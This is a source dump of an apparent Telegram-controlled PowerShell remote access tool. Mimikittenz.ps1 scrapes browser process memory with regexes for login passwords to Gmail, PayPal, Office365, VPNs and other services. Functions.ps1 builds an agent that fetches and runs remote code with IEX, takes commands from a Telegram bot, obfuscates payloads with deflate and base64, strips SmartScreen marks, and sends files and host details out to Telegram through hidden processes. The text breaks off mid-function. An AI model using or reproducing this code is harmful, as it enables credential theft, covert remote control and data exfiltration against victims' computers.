├── Funciones ├── Invoke-MimiGatoz.ps1 └── mimikittenz.ps1 ├── Functions.ps1 ├── PSBoTelegram.ps1 ├── README.md └── images ├── OutFiles.png └── parametros.png /Funciones/mimikittenz.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .SYNOPSIS 3 | 4 | Extracts juicy info from memory. 5 | 6 | Author: Jamieson O'Reilly (https://au.linkedin.com/in/jamieson-o-reilly-13ab6470) 7 | License: https://creativecommons.org/licenses/by/4.0/ 8 | 9 | 10 | .DESCRIPTION 11 | 12 | Utilizes Windows function ReadProcessMemory() to extract juicy information from target process memory using regex. 13 | 14 | .EXAMPLE 15 | 16 | Invoke-mimikittenz 17 | 18 | .NOTES 19 | 20 | Depending on each process cleanup, process generally must be running in order to extract info. 21 | #> 22 | 23 | 24 | $asciiart = @" 25 | 4pSA4pSA4pSA4paQ4paA4paE4pSA4pSA4pSA4pSA4pSA4pSA4paE4paA4paM4pSA4pSA4pSA4paE4paE4paE4paE4paE4paE4paE4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSA4pSADQrilIDilIDilIDilozilpLilpLiloDiloTiloTiloTiloTiloDilpLilpLilpDiloTiloDiloDilpLilojilojilpLilojilojilpLiloDiloDiloTilIDilIDilIDilIDilIDilIDilIDilIDilIDilIANCuKUgOKUgOKWkOKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWgOKWhOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgA0K4pSA4pSA4paM4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paE4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paA4paE4pSA4pSA4pSA4pSA4pSA4pSADQriloDilojilpLilpLilojilozilpLilpLilojilpLilpLilpDilojilpLilpLiloDilpLilpLilpLilpLilpLilpLilpLilpLilpLilpLilpLilpLilpLilpLilpLilpLilozilIDilIDilIDilIDilIANCuKWgOKWjOKWkuKWkuKWkuKWkuKWkuKWgOKWkuKWgOKWkuKWkuKWkuKWkuKWkuKWgOKWgOKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkOKUgOKUgOKUgOKWhOKWhA0K4paQ4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paM4paE4paI4paS4paIDQrilpDilpLilpLilpLilpJtaW1pa2l0dGVuei0xLjAtYWxwaGHilpLilpLilpLilpLilpLilpLilpLilpLilpLilpDilpLilojiloDilIANCuKWkOKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkOKWgOKUgOKUgOKUgA0K4paQ4paS4paS4paS4paS4paS4paSQ0FOIEkgSEFaIFdBTT/ilpLilpLilpLilpLilpLilpLilpLilpLilpLilpLilpLilpLilozilIDilIDilIDilIANCuKUgOKWjOKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkOKUgOKUgOKUgOKUgOKUgA0K4pSA4paQ4paS4paS4paSamFtaWVzb25AZHJpbmdlbnNlYy5jb23ilpLilpLilpLilpLilozilIDilIDilIDilIDilIANCuKUgOKUgOKWjOKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkuKWkOKUgOKUgOKUgOKUgOKUgOKUgA0K4pSA4pSA4paQ4paE4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paS4paE4paM4pSA4pSA4pSA4pSA4pSA4pSADQrilIDilIDilIDilIDiloDiloTiloTiloDiloDiloDiloDiloTiloTiloDiloDiloDiloDiloDiloDiloTiloTiloDiloDiloDiloDiloDiloDiloTiloTiloDilIDilIDilIDilIDilIDilIDilIDilIA= 26 | "@ 27 | $Source2 = @" 28 | using System; 29 | using System.Collections.Generic; 30 | using System.Text; 31 | using System.Diagnostics; 32 | using System.Runtime.InteropServices; 33 | using System.Text.RegularExpressions; 34 | using System.IO; 35 | 36 | namespace mimikittenz 37 | { 38 | public class MemProcInspector 39 | { 40 | static MemProcInspector() 41 | { 42 | InitRegexes(); 43 | } 44 | 45 | 46 | 47 | public static void SaveToFile(string fileName, List matches) 48 | { 49 | StringBuilder builder = new StringBuilder(); 50 | foreach (MatchInfo s in matches) 51 | { 52 | builder.AppendLine(s.PatternMatch); 53 | } 54 | File.WriteAllText(fileName, builder.ToString()); 55 | 56 | } 57 | 58 | public static void AddRegex(string name, string pattern) 59 | { 60 | regexes.Add(new RegexRecord(name, pattern)); 61 | } 62 | 63 | public static List regexes = new List(); 64 | 65 | public static List InspectManyProcs(params string[] procNames) 66 | { 67 | 68 | 69 | 70 | List lstMatch = new List(); 71 | string res = "None"; 72 | foreach (string procName in procNames) 73 | { 74 | try 75 | { 76 | 77 | Process[] procs = Process.GetProcessesByName(procName); 78 | foreach (Process pr in procs) 79 | { 80 | Process process = pr; 81 | 82 | res = InspectProc(process, ref lstMatch); 83 | 84 | } 85 | } 86 | catch (Exception ex) 87 | { 88 | res = ex.Message; 89 | res = ex.StackTrace; 90 | } 91 | } 92 | List lstToReturn = new List(); 93 | 94 | return lstMatch; 95 | } 96 | 97 | private static void InitRegexes() 98 | { 99 | regexes.Clear(); 100 | } 101 | 102 | 103 | 104 | private static string InspectProc(Process process, ref List lstMatch) 105 | { 106 | string res = ""; 107 | IntPtr processHandle = MInterop.OpenProcess(MInterop.PROCESS_WM_READ | MInterop.PROCESS_QUERY_INFORMATION, false, process.Id); 108 | if (processHandle.ToInt64() == 0) 109 | { 110 | int err = Marshal.GetLastWin32Error(); 111 | 112 | } 113 | 114 | res = SearchProc(processHandle, ref lstMatch); 115 | MInterop.CloseHandle(processHandle); 116 | return res; 117 | } 118 | 119 | private static string SearchProc(IntPtr processHandle, ref List lstMatch) 120 | { 121 | string res = ""; 122 | MInterop.SYSTEM_INFO si = new MInterop.SYSTEM_INFO(); 123 | MInterop.GetSystemInfo(out si); 124 | 125 | long createdSize = 1; 126 | byte[] lpBuffer = new byte[createdSize]; 127 | 128 | Int64 total = 0; 129 | 130 | long regionStart = si.minimumApplicationAddress.ToInt64(); //(BYTE*)si.lpMinimumApplicationAddress; 131 | bool skipRegion = false; 132 | bool stop = false; 133 | //while (regionStart < Math.Min(0x7ffeffff, si.maximumApplicationAddress.ToInt64()) && !stop) 134 | while (regionStart < si.maximumApplicationAddress.ToInt64() && !stop) 135 | { 136 | //MInterop.MEMORY_BASIC_INFORMATION memInfo; 137 | MInterop.MEMORY_BASIC_INFORMATION memInfo; 138 | 139 | long regionRead = 0; 140 | long regionSize; 141 | int resulq = MInterop.VirtualQueryEx(processHandle, (IntPtr)regionStart, out memInfo, (uint)Marshal.SizeOf(typeof(MInterop.MEMORY_BASIC_INFORMATION))); 142 | if (resulq == 0) 143 | { 144 | //XVERBOSE(L"VirtualQueryEx error %d\n", GetLastError()); 145 | int err = Marshal.GetLastWin32Error(); 146 | Marshal.ThrowExceptionForHR(err); 147 | break; 148 | } 149 | regionSize = (memInfo.BaseAddress.ToInt64() + memInfo.RegionSize.ToInt64() - regionStart); 150 | if (MInterop.IsDataRegion(memInfo) == false) 151 | { 152 | 153 | } 154 | if (skipRegion) 155 | { 156 | skipRegion = false; 157 | } 158 | else 159 | if (MInterop.IsDataRegion(memInfo)) 160 | { 161 | 162 | if (createdSize < regionSize) 163 | { 164 | createdSize = regionSize; 165 | lpBuffer = new byte[createdSize]; 166 | } 167 | bool resRead = false; 168 | try 169 | { 170 | resRead = MInterop.ReadProcessMemory(processHandle, new IntPtr(regionStart), lpBuffer, regionSize, out regionRead); 171 | } 172 | catch //(AccessViolationException ex) 173 | { 174 | resRead = false; 175 | } 176 | // result |= SearchRegion(process, regionStart, regionSize, regexData, regionRead, buffer); 177 | regionSize = (int)regionRead; 178 | if (!resRead) 179 | { 180 | // looks like the memory state has been altered by the target process 181 | // between our VirtualQueryEx and ReadProcessMemory calls -> 182 | // learn the size of the changed region and jump over it on the next iteration 183 | skipRegion = true; 184 | //XVERBOSE(L"Skipping a non-readable region\n"); 185 | } 186 | if (resRead) 187 | { 188 | List strsTolook = new List(); 189 | string str1 = UnicodeEncoding.Unicode.GetString(lpBuffer, 0, (int)regionRead); 190 | string str11 = UnicodeEncoding.Unicode.GetString(lpBuffer, 0 + 1, (int)regionRead - 1); 191 | string str4 = UnicodeEncoding.ASCII.GetString(lpBuffer, 0, (int)regionRead); 192 | strsTolook.Add(str1); 193 | strsTolook.Add(str4); 194 | strsTolook.Add(str11); 195 | 196 | foreach (RegexRecord regexRec in regexes) 197 | { 198 | 199 | foreach (string str in strsTolook) 200 | { 201 | MatchCollection matches3 = regexRec.Regex.Matches(str); 202 | if (matches3.Count > 0) 203 | { 204 | for (int i = 0; i < matches3.Count; i++) 205 | if (matches3[i].Success && IsMatchesContain(lstMatch, matches3[i].Value) == false && IsRegexRecordsContain(matches3[i].Value) == false) 206 | { 207 | MatchInfo m = new MatchInfo(); 208 | m.PatternName = regexRec.Name; 209 | m.PatternMatch = matches3[i].Value; 210 | 211 | lstMatch.Add(m); 212 | } 213 | res = matches3[0].Value; 214 | 215 | 216 | } 217 | } 218 | } 219 | 220 | 221 | } 222 | 223 | total += regionSize; 224 | } 225 | regionStart += regionSize; 226 | //stop = IsStop(stopEvent); 227 | } 228 | //XVERBOSE(L"Totally searched %lu bytes\n", total); 229 | //return result; 230 | return res; 231 | } 232 | 233 | private static bool IsMatchesContain(List matches, string val) 234 | { 235 | foreach (MatchInfo item in matches) 236 | { 237 | if (string.Compare(item.PatternMatch, val) == 0) 238 | return true; 239 | } 240 | return false; 241 | } 242 | 243 | private static bool IsRegexRecordsContain(string pattern) 244 | { 245 | foreach (RegexRecord item in regexes) 246 | { 247 | if (string.Compare(item.Pattern, pattern) == 0) 248 | return true; 249 | } 250 | return false; 251 | } 252 | 253 | 254 | const int MAX_PREFIX_LENGTH = 1; 255 | // the essence 256 | // estimated upper limit to allocate enough buffers 257 | const int MAX_MATCH_LENGTH = 1024; 258 | 259 | // the buffer should be large enough to contain at least MAX_CHECK_LENGTH*sizeof(wchar_t) bytes 260 | const int DEFAULT_SEARCH_BUFFER_SIZE = (10 * 1024 * 1024); 261 | // the upper limit of the buffer size 262 | const int MAX_SEARCH_BUFFER_SIZE = (25 * 1024 * 1024); 263 | 264 | 265 | } 266 | 267 | public class MatchInfo 268 | { 269 | 270 | public string PatternName; 271 | public string PatternMatch; 272 | 273 | // public string ProccesName { get; set; } 274 | 275 | } 276 | public class RegexRecord 277 | { 278 | Regex mRegex; 279 | 280 | protected RegexRecord() 281 | { 282 | 283 | } 284 | 285 | public RegexRecord(string name, string pattern) 286 | { 287 | Name = name; 288 | Pattern = pattern; 289 | mRegex = new Regex(pattern); 290 | } 291 | 292 | public Regex Regex { get { return mRegex; } } 293 | 294 | 295 | 296 | public string Name; 297 | 298 | 299 | public string Pattern; 300 | 301 | 302 | 303 | } 304 | 305 | public class MInterop 306 | { 307 | [DllImport("kernel32.dll", SetLastError = true)] 308 | [return: MarshalAs(UnmanagedType.Bool)] 309 | public static extern bool CloseHandle(IntPtr hObject); 310 | 311 | [DllImport("kernel32.dll", SetLastError = true)] 312 | public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId); 313 | 314 | [DllImport("kernel32.dll", SetLastError = true)] 315 | public static extern bool ReadProcessMemory(IntPtr hProcess, 316 | IntPtr lpBaseAddress, byte[] lpBuffer, long dwSize, out long lpNumberOfBytesRead); 317 | 318 | public const int PROCESS_WM_READ = 0x0010; 319 | public const int PROCESS_QUERY_INFORMATION = 0x00000400; 320 | 321 | [DllImport("kernel32.dll", SetLastError = true)] 322 | public static extern int VirtualQueryEx(IntPtr hProcess, IntPtr lpAddress, out MEMORY_BASIC_INFORMATION lpBuffer, uint dwLength); 323 | 324 | [StructLayout(LayoutKind.Sequential)] 325 | public struct MEMORY_BASIC_INFORMATION32 326 | { 327 | public IntPtr BaseAddress; 328 | public IntPtr AllocationBase; 329 | public uint AllocationProtect; 330 | public IntPtr RegionSize; 331 | public uint State; 332 | public uint Protect; 333 | public uint Type; 334 | } 335 | [StructLayout(LayoutKind.Sequential)] 336 | public struct MEMORY_BASIC_INFORMATION 337 | { 338 | public IntPtr BaseAddress; 339 | public IntPtr AllocationBase; 340 | public uint AllocationProtect; 341 | public short aligment; 342 | public IntPtr RegionSize; 343 | public uint State; 344 | public uint Protect; 345 | public uint Type; 346 | public short aligment2; 347 | } 348 | 349 | public enum AllocationProtect : uint 350 | { 351 | PAGE_EXECUTE = 0x00000010, 352 | PAGE_EXECUTE_READ = 0x00000020, 353 | PAGE_EXECUTE_READWRITE = 0x00000040, 354 | PAGE_EXECUTE_WRITECOPY = 0x00000080, 355 | PAGE_NOACCESS = 0x00000001, 356 | PAGE_READONLY = 0x00000002, 357 | PAGE_READWRITE = 0x00000004, 358 | PAGE_WRITECOPY = 0x00000008, 359 | PAGE_GUARD = 0x00000100, 360 | PAGE_NOCACHE = 0x00000200, 361 | PAGE_WRITECOMBINE = 0x00000400 362 | } 363 | 364 | [StructLayout(LayoutKind.Sequential)] 365 | public struct SYSTEM_INFO 366 | { 367 | public ushort processorArchitecture; 368 | ushort reserved; 369 | public uint pageSize; 370 | public IntPtr minimumApplicationAddress; 371 | public IntPtr maximumApplicationAddress; 372 | public IntPtr activeProcessorMask; 373 | public uint numberOfProcessors; 374 | public uint processorType; 375 | public uint allocationGranularity; 376 | public ushort processorLevel; 377 | public ushort processorRevision; 378 | } 379 | 380 | [DllImport("kernel32.dll")] 381 | public static extern void GetSystemInfo(out SYSTEM_INFO lpSystemInfo); 382 | 383 | public enum StateEnum : uint 384 | { 385 | MEM_COMMIT = 0x1000, 386 | MEM_FREE = 0x10000, 387 | MEM_RESERVE = 0x2000 388 | } 389 | 390 | public enum TypeEnum : uint 391 | { 392 | MEM_IMAGE = 0x1000000, 393 | MEM_MAPPED = 0x40000, 394 | MEM_PRIVATE = 0x20000 395 | } 396 | 397 | internal static bool IsDataRegion(MEMORY_BASIC_INFORMATION memInfo) 398 | { 399 | 400 | bool res = // check this is a live (not free/reserved) memory 401 | (memInfo.State & (uint)StateEnum.MEM_COMMIT) != 0 && 402 | // don't examine memory mapped files sections / PE images 403 | // (memInfo.Type & (uint)TypeEnum.MEM_PRIVATE) != 0 && 404 | // don't read PAGE_GUARD memory to avoid altering target state 405 | (memInfo.Protect & ((uint)AllocationProtect.PAGE_NOACCESS | (uint)AllocationProtect.PAGE_GUARD)) == 0 406 | && 407 | // make sure the memory is readable 408 | (memInfo.Protect & ((uint)AllocationProtect.PAGE_READONLY | (uint)AllocationProtect.PAGE_READWRITE | 409 | (uint)AllocationProtect.PAGE_EXECUTE_READ | (uint)AllocationProtect.PAGE_EXECUTE_READWRITE | (uint)AllocationProtect.PAGE_EXECUTE_WRITECOPY)) != 0; 410 | 411 | return res; 412 | } 413 | 414 | public enum ProcessAccessTypes 415 | { 416 | PROCESS_TERMINATE = 0x00000001, 417 | PROCESS_CREATE_THREAD = 0x00000002, 418 | PROCESS_SET_SESSIONID = 0x00000004, 419 | PROCESS_VM_OPERATION = 0x00000008, 420 | PROCESS_VM_READ = 0x00000010, 421 | PROCESS_VM_WRITE = 0x00000020, 422 | PROCESS_DUP_HANDLE = 0x00000040, 423 | PROCESS_CREATE_PROCESS = 0x00000080, 424 | PROCESS_SET_QUOTA = 0x00000100, 425 | PROCESS_SET_INFORMATION = 0x00000200, 426 | PROCESS_QUERY_INFORMATION = 0x00000400, 427 | STANDARD_RIGHTS_REQUIRED = 0x000F0000, 428 | SYNCHRONIZE = 0x00100000, 429 | PROCESS_ALL_ACCESS = PROCESS_TERMINATE | PROCESS_CREATE_THREAD | PROCESS_SET_SESSIONID | PROCESS_VM_OPERATION | 430 | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_DUP_HANDLE | PROCESS_CREATE_PROCESS | PROCESS_SET_QUOTA | 431 | PROCESS_SET_INFORMATION | PROCESS_QUERY_INFORMATION | STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE 432 | } 433 | } 434 | } 435 | 436 | 437 | "@ 438 | 439 | $inmem=New-Object -TypeName System.CodeDom.Compiler.CompilerParameters 440 | $inmem.GenerateInMemory=1 441 | $inmem.ReferencedAssemblies.AddRange($(@("System.dll", $([PSObject].Assembly.Location)))) 442 | 443 | Add-Type -TypeDefinition $Source2 -Language CSharp -CompilerParameters $inmem 444 | 445 | [mimikittenz.MemProcInspector]::regexes.Clear() 446 | #Internet Banking 447 | #Err... Taken out for good measure 448 | 449 | #Web E-mail 450 | 451 | #Gmail 452 | [mimikittenz.MemProcInspector]::AddRegex("Gmail","&Email=.{1,99}?&Passwd=.{1,99}?&PersistentCookie=") 453 | 454 | 455 | #Web Services 456 | 457 | #Dropbox 458 | [mimikittenz.MemProcInspector]::AddRegex("Dropbox","login_email=.{1,99}&login_password=.{1,99}&") 459 | #SalesForce (Needs fix) 460 | #[mimikittenz.MemProcInspector]::AddRegex("SalesForce","&display=page&username=.{1,32}&pw=.{1,16}&Login=") 461 | #Office365 462 | [mimikittenz.MemProcInspector]::AddRegex("Office365","login=.{1,32}&passwd=.{1,22}&PPSX=") 463 | #Microsoft OneDrive 464 | [mimikittenz.MemProcInspector]::AddRegex("MicrosoftOneDrive","login=.{1,42}&passwd=.{1,22}&type=.{1,2}&PPFT=") 465 | #PayPal 466 | [mimikittenz.MemProcInspector]::AddRegex("PayPal","login_email=.{1,48}&login_password=.{1,16}&submit=Log\+In&browser_name") 467 | #AWS Web Services 468 | [mimikittenz.MemProcInspector]::AddRegex("awsWebServices","&email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=") 469 | #Outlook Web 2015 470 | [mimikittenz.MemProcInspector]::AddRegex("OutlookWeb","&username=.{1,48}&password=.{1,48}&passwordText") 471 | #Slack 472 | [mimikittenz.MemProcInspector]::AddRegex("Slack","&crumb=.{1,70}&email=.{1,50}&password=.{1,48}") 473 | #CitrixOnline 474 | [mimikittenz.MemProcInspector]::AddRegex("CitrixOnline","emailAddress=.{1,50}&password=.{1,50}&submit") 475 | 476 | #Accounting 477 | 478 | #Xero 479 | [mimikittenz.MemProcInspector]::AddRegex("Xero ","fragment=&userName=.{1,32}&password=.{1,22}&__RequestVerificationToken=") 480 | #MYOB 481 | [mimikittenz.MemProcInspector]::AddRegex("MYOB","UserName=.{1,50}&Password=.{1,50}&RememberMe=") 482 | #SSL-VPN's 483 | 484 | #Juniper SSL-VPN 485 | [mimikittenz.MemProcInspector]::AddRegex("JuniperSSLVPN","tz_offset=-.{1,6}&username=.{1,22}&password=.{1,22}&realm=.{1,22}&btnSubmit=") 486 | 487 | 488 | #Social Media 489 | 490 | #Twitter 491 | [mimikittenz.MemProcInspector]::AddRegex("Twitter","username_or_email%5D=.{1,42}&session%5Bpassword%5D=.{1,22}&remember_me=") 492 | #Facebook 493 | [mimikittenz.MemProcInspector]::AddRegex("Facebook","lsd=.{1,10}&email=.{1,42}&pass=.{1,22}&default_persistent=") 494 | 495 | #Anti-Forensics 496 | 497 | #Malwr 498 | [mimikittenz.MemProcInspector]::AddRegex("Malwr","&username=.{1,32}&password=.{1,22}&next=") 499 | #VirusTotal 500 | [mimikittenz.MemProcInspector]::AddRegex("VirusTotal","password=.{1,22}&username=.{1,42}&next=%2Fen%2F&response_format=json") 501 | #AnubisLabs 502 | [mimikittenz.MemProcInspector]::AddRegex("AnubisLabs","username=.{1,42}&password=.{1,22}&login=login") 503 | 504 | #Remote Access 505 | 506 | #Citrix NetScaler 507 | [mimikittenz.MemProcInspector]::AddRegex("CitrixNetScaler","login=.{1,22}&passwd=.{1,42}") 508 | #Remote Desktop Web Access 2012 509 | [mimikittenz.MemProcInspector]::AddRegex("RDPWeb","DomainUserName=.{1,52}&UserPass=.{1,42}&MachineType") 510 | 511 | 512 | 513 | #Dev Related 514 | 515 | #Jira 516 | 517 | 518 | 519 | #Redmine 520 | [mimikittenz.MemProcInspector]::AddRegex("Redmine","username=.{1,50}&password=.{1,50}&login=Login") 521 | #Github 522 | [mimikittenz.MemProcInspector]::AddRegex("Github","%3D%3D&login=.{1,50}&password=.{1,50}") 523 | #Bugzilla 524 | [mimikittenz.MemProcInspector]::AddRegex("BugZilla","Bugzilla_login=.{1,50}&Bugzilla_password=.{1,50}") 525 | #Zendesk 526 | [mimikittenz.MemProcInspector]::AddRegex("Zendesk","user%5Bemail%5D=.{1,50}&user%5Bpassword%5D=.{1,50}") 527 | #Cpanel 528 | [mimikittenz.MemProcInspector]::AddRegex("Cpanel","user=.{1,50}&pass=.{1,50}") 529 | [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($asciiart)) 530 | $matches=[mimikittenz.MemProcInspector]::InspectManyProcs("iexplore","chrome","firefox") 531 | 532 | write-output $matches 533 | -------------------------------------------------------------------------------- /Functions.ps1: -------------------------------------------------------------------------------- 1 | ########################################################## Agent Bot Code ########################################################## 2 | 3 | function create_agent {param ($botkey,$chat_id) 4 | $agent_bot = '[string]$botkey = "your_token";[string]$bot_Master_ID = "your_chat_id";[int]$delay = "your_delay";IEX (Invoke-WebRequest "https://raw.githubusercontent.com/hackplayers/psbotelegram/master/Functions.ps1").content;$chat_id = $bot_Master_ID;$getUpdatesLink = "https://api.telegram.org/bot$botkey/getUpdates";[int]$first_connect = "1";while($true) { $json = Invoke-WebRequest -Uri $getUpdatesLink -Body @{offset=$offset} | ConvertFrom-Json;$l = $json.result.length;$i = 0;if ($first_connect -eq 1) {$texto = "$env:COMPUTERNAME connected con bypassuac :D"; envia-mensaje -text $texto -chat $chat_id -botkey $botkey; $first_connect = $first_connect + 1};while ($i -lt $l) {$offset = $json.result[$i].update_id + 1; $comando = $json.result[$i].message.text;test-command -comando $comando -botkey $botkey -chat_id $chat_id -first_connect $first_connect;$i++} ;Start-Sleep -s $delay ;$first_connect++ }' ; $agent_bot = $agent_bot -replace "your_token", "$botkey" -replace "your_chat_id", "$chat_id" -replace "your_delay", "1" ; return $agent_bot} 5 | 6 | function code_a_base64 {param ($code) 7 | $ms = New-Object IO.MemoryStream 8 | $action = [IO.Compression.CompressionMode]::Compress 9 | $cs = New-Object IO.Compression.DeflateStream ($ms,$action) 10 | $sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII) 11 | $code | ForEach-Object {$sw.WriteLine($_)} 12 | $sw.Close() 13 | $Compressed = [Convert]::ToBase64String($ms.ToArray()) 14 | $command = "Invoke-Expression `$(New-Object IO.StreamReader (" + 15 | "`$(New-Object IO.Compression.DeflateStream (" + 16 | "`$(New-Object IO.MemoryStream (,"+ 17 | "`$([Convert]::FromBase64String('$Compressed')))), " + 18 | "[IO.Compression.CompressionMode]::Decompress)),"+ 19 | " [Text.Encoding]::ASCII)).ReadToEnd();" 20 | $UnicodeEncoder = New-Object System.Text.UnicodeEncoding 21 | $codeScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($command)) 22 | return $codeScript 23 | } 24 | 25 | ############################################################# Funciones propias ############################################################# 26 | 27 | function envia-mensaje { param ($botkey,$chat,$text)Invoke-Webrequest -uri "https://api.telegram.org/bot$botkey/sendMessage?chat_id=$chat_id&text=$texto" -Method post} 28 | 29 | function Disable-Smartscreen {param ($File,$Output) $archivo = get-item $file ; $file = [io.file]::ReadAllBytes($File) ; [io.file]::WriteAllBytes($output,$file) } 30 | 31 | function bot-send { 32 | 33 | param ($photo,$file,$botkey,$chat_id) 34 | 35 | $proxy = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings').proxyServer 36 | $ruta = $env:USERPROFILE + "\appdata\local\temp\1" 37 | $curl_zip = $ruta + "\curl.zip" 38 | $curl = $ruta + "\" + "curl.exe" 39 | $curl_mod = $ruta + "\" + "curl_mod.exe" 40 | if ( (Test-Path $ruta) -eq $false) {mkdir $ruta} else {} 41 | if ( (Test-Path $curl_mod) -eq $false ) {$webclient = "system.net.webclient" ; $webclient = New-Object $webclient ; $webrequest = $webclient.DownloadFile("https://raw.githubusercontent.com/cybervaca/psbotelegram/master/Funciones/curl.zip","$curl_zip") 42 | [System.Reflection.Assembly]::LoadWithPartialName('System.IO.Compression.FileSystem') | Out-Null 43 | [System.IO.Compression.ZipFile]::ExtractToDirectory("$curl_zip","$ruta") | Out-Null 44 | 45 | Disable-Smartscreen -File $curl -Output $curl_mod 46 | Remove-Item $curl ; Remove-Item $curl_zip 47 | } 48 | 49 | if ($file -ne $null) { 50 | $proceso = $curl_mod 51 | $uri = "https://api.telegram.org/bot" + $botkey + "/sendDocument" 52 | if ($proxy -ne $null) {$argumenlist = $uri + ' -F chat_id=' + "$chat_id" + ' -F document=@' + $file + ' -k ' + '--proxy ' + $proxy } else {$argumenlist = $uri + ' -F chat_id=' + "$chat_id" + ' -F document=@' + $file + ' -k '} 53 | Start-Process $proceso -ArgumentList $argumenlist -WindowStyle Hidden} 54 | 55 | if ($photo -ne $null){ 56 | 57 | $proceso = $curl_mod 58 | $uri = "https://api.telegram.org/bot" + $botkey + "/sendPhoto" 59 | if ($proxy -ne $null) {$argumenlist = $uri + ' -F chat_id=' + "$chat_id" + ' -F photo=@' + $photo + ' -k ' + '--proxy ' + $proxy } else {$argumenlist = $uri + ' -F chat_id=' + "$chat_id" + ' -F photo=@' + $photo + ' -k '} 60 | Start-Process $proceso -ArgumentList $argumenlist -WindowStyle Hidden 61 | 62 | } 63 | 64 | } 65 | 66 | function get-info {$OS = Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME 67 | $Bios = Get-WmiObject -Class Win32_BIOS -ComputerName $env:COMPUTERNAME 68 | $sheetS = Get-WmiObject -Class Win32_ComputerSystem -ComputerName $env:COMPUTERNAME 69 | $sheetPU = Get-WmiObject -Class Win32_Processor -ComputerName $env:COMPUTERNAME 70 | $drives = Get-WmiObject -ComputerName $env:COMPUTERNAME Win32_LogicalDisk | Where-Object {$_.DriveType -eq 3} 71 | $pingStatus = Get-WmiObject -Query "Select * from win32_PingStatus where Address='$env:COMPUTERNAME' " 72 | $IPAddress= (Get-WmiObject Win32_NetworkAdapterConfiguration -ComputerName $env:COMPUTERNAME | ? {$_.ipenabled}).ipaddress 73 | $OSRunning = $OS.caption + " " + $OS.OSArchitecture + " SP " + $OS.ServicePackMajorVersion 74 | $NoOfProcessors=$sheetS.numberofProcessors 75 | $name=$SheetPU|select name -First 1 76 | $Manufacturer=$sheetS.Manufacturer 77 | $Model=$sheetS.Model 78 | $ProcessorName=$SheetPU|select name -First 1 79 | $Mac = (Get-WmiObject -class Win32_NetworkAdapter -ComputerName $env:COMPUTERNAME | ? { $_.PhysicalAdapter } ).macaddress 80 | $date = Get-Date 81 | $uptime = $OS.ConvertToDateTime($OS.lastbootuptime) 82 | $sheetPUInfo = $name.Name + " & has " + $sheetPU.NumberOfCores + " Cores & the FSB is " + $sheetPU.ExtClock + " Mhz" 83 | $sheetPULOAD = $sheetPU.LoadPercentage 84 | $serialnumer = (Get-WmiObject -Class Win32_BIOS -ComputerName $env:COMPUTERNAME ).serialnumber 85 | $RAM = (Get-WmiObject -class Win32_ComputerSystem -ComputerName $env:COMPUTERNAME ).totalphysicalmemory / 1gb 86 | $ram_round= [math]::Round($ram,0) 87 | $MonitorModelo = (gwmi WmiMonitorID -ComputerName $env:COMPUTERNAME -Namespace root\wmi | Select @{n="Model";e={[System.Text.Encoding]::ASCII.GetString($_.UserFriendlyName -ne 00)}}).model 88 | $MonitorSerial = (gwmi WmiMonitorID -ComputerName $env:COMPUTERNAME -Namespace root\wmi | Select @{n="Serial";e={[System.Text.Encoding]::ASCII.GetString($_.SerialNumberID -ne 00)}}).serial 89 | $Disco_duro = $drives.Size / 1gb ; $Disco_duro = [math]::Round($Disco_duro,0) ; $Disco_duro = "$Disco_duro Gb" 90 | $PC = New-Object psobject -Property @{ 91 | "Nombre" = $env:COMPUTERNAME 92 | "Modelo Monitor" = $MonitorModelo 93 | "Monitor Num. Serie" = $MonitorSerial 94 | "Sistema Operativo" = $OSRunning 95 | "Procesador" = $name.name 96 | "Fabricante" = $Manufacturer 97 | "Modelo" = $Model 98 | "Num. Procesadores" = "$NoOfProcessors" 99 | "Memoria RAM" = "$ram_round Gb" 100 | "Direccion IP" = [string]$IPAddress[0] 101 | "MAC" = $mac 102 | "Numero de serie" = $serialnumer 103 | "Disco Duro" = $Disco_duro 104 | } 105 | $PC | select-Object Nombre, "Modelo Monitor", "Monitor Num. Serie", "Sistema Operativo", "Procesador", "Fabricante", "Modelo", "Num. Procesadores", "Memoria RAM", "Disco Duro", "Direccion IP", "MAC", "Numero de Serie" 106 | } 107 | function public-ip {param ($botkey) 108 | $datos_ip_publica = Invoke-WebRequest -Uri http://ifconfig.co/json | ConvertFrom-Json 109 | $resultado = New-Object psobject -Property @{"IP"= $datos_ip_publica.ip 110 | "Pais" = $datos_ip_publica.country 111 | "Ciudad" = 